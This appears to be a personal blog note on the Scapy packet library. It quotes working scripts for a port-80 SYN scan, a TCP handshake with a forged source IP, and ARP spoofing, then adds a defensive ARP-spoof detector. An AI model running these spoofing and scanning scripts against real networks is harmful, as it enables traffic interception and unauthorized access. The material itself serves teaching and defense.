According to its author, this is an all-purpose network tool: besides letting you inspect packets at every layer of TCP/IP, it can also craft and send them. The author boldly claims, “it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.”
Project site: http://www.secdev.org/projects/scapy/
This is just a quick backup for myself; I will look into it further when I need it.
Below is an example taken from the document “Ruling the Network with Python”:
#!/usr/bin/env python
import sys
from scapy.all import *   # the 0.9.x original used "from scapy import *"

conf.verb = 0

if len(sys.argv) != 2:
    print("Usage: ./pscan.py <target>")
    sys.exit(1)

target = sys.argv[1]
# one SYN to port 80 for every address in the target range
p = IP(dst=target) / TCP(dport=80, flags="S")
ans, unans = sr(p, timeout=9)

for a in ans:
    # a[1] is the reply. Look at the TCP layer explicitly (a[1].flags would
    # return the IP header's own flags field); SYN/ACK (0x12) means port 80
    # answered.
    if TCP in a[1] and (a[1][TCP].flags & 0x12) == 0x12:
        print(a[1].src)
The effect is a scan of port 80 across an IP range:
detach@luna:~/lab/scapy-0.9.17$ sudo ./pscan.py 192.168.9.0/24
192.168.9.1
192.168.9.2
192.168.9.11
192.168.9.14
There is also this one: forge the source IP and send TCP segments to a remote address (routers only check whether the destination address lies within their own “delivery” range). Note that the destination address cannot be a local IP:
#!/usr/bin/env python
import sys
from scapy.all import *   # the 0.9.x original used "from scapy import *"

conf.verb = 0

if len(sys.argv) != 4:
    print("Usage: ./spoof.py <target> <spoofed_ip> <port>")
    sys.exit(1)

target = sys.argv[1]
spoofed_ip = sys.argv[2]
port = int(sys.argv[3])

# first step of the handshake, carrying the forged source address
p1 = IP(dst=target, src=spoofed_ip) / TCP(dport=port, sport=5000, flags="S")
send(p1)

print("Okay, SYN sent. Enter the sniffed sequence number now: ")
seq = sys.stdin.readline()
print("Okay, using sequence number " + seq)
seq = int(seq[:-1])   # drop the trailing newline

# third step: acknowledge the sequence number from the target's SYN/ACK
p2 = IP(dst=target, src=spoofed_ip) / TCP(dport=port, sport=5000,
                                          flags="A", ack=seq + 1, seq=1)
send(p2)
print("Okay, final ACK sent. Check netstat on your target :-)")
You may also find ARP spoofing useful:
import sys
from scapy.all import *

# same arguments as spoof.py above
target = sys.argv[1]
spoofed_ip = sys.argv[2]

p = ARP()
p.op = 2                          # 2 = ARP reply ("is-at")
p.hwsrc = "00:11:22:aa:bb:cc"     # MAC the reply claims spoofed_ip has
p.psrc = spoofed_ip
p.hwdst = "ff:ff:ff:ff:ff:ff"     # broadcast hardware destination
p.pdst = target
send(p)
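A defender-side counterpart, added here as an example (not from the original post or from scapy's documentation): it walks ARP records carrying the same field names the fragment above sets (op, hwsrc, psrc, hwdst, pdst) and flags an unsolicited reply addressed to the broadcast MAC, plus any reply that rebinds a known IP to a different MAC. The sample records are constructed, and the ArpWatcher/scan names are my own.

```python
BROADCAST = "ff:ff:ff:ff:ff:ff"
ARP_REPLY = 2          # op=2, the value the fragment above sets


class ArpWatcher:
    """Track IP -> MAC bindings learned from ARP replies and flag anomalies."""

    def __init__(self):
        self.bindings = {}   # psrc -> hwsrc from the first reply seen

    def observe(self, rec):
        """Return a list of alert tuples for one ARP record (a dict using
        the scapy field names op, hwsrc, psrc, hwdst, pdst)."""
        alerts = []
        if rec["op"] != ARP_REPLY:
            return alerts            # requests carry no binding claim
        # An is-at reply addressed to the broadcast MAC, which nobody asked
        # for, is exactly what the fragment above sends.
        if rec["hwdst"] == BROADCAST:
            alerts.append(("broadcast_reply", rec["psrc"], rec["hwsrc"]))
        known = self.bindings.get(rec["psrc"])
        if known is None:
            self.bindings[rec["psrc"]] = rec["hwsrc"]
        elif known != rec["hwsrc"]:
            alerts.append(("mac_changed", rec["psrc"], known, rec["hwsrc"]))
        return alerts


def scan(records):
    """Run every record through one watcher and collect all alerts."""
    watcher = ArpWatcher()
    alerts = []
    for rec in records:
        alerts.extend(watcher.observe(rec))
    return alerts


# Constructed sample traffic (not a real capture): a normal request/reply
# pair for 192.168.9.1, then a forged reply built like the fragment above.
SAMPLE = [
    {"op": 1, "hwsrc": "00:aa:bb:cc:dd:11", "psrc": "192.168.9.11",
     "hwdst": BROADCAST, "pdst": "192.168.9.1"},
    {"op": 2, "hwsrc": "00:aa:bb:cc:dd:01", "psrc": "192.168.9.1",
     "hwdst": "00:aa:bb:cc:dd:11", "pdst": "192.168.9.11"},
    {"op": 2, "hwsrc": "00:11:22:aa:bb:cc", "psrc": "192.168.9.1",
     "hwdst": BROADCAST, "pdst": "192.168.9.11"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

Seeding `bindings` from a known-good inventory instead of learning from the first reply removes the window in which a forged reply arriving first would be trusted.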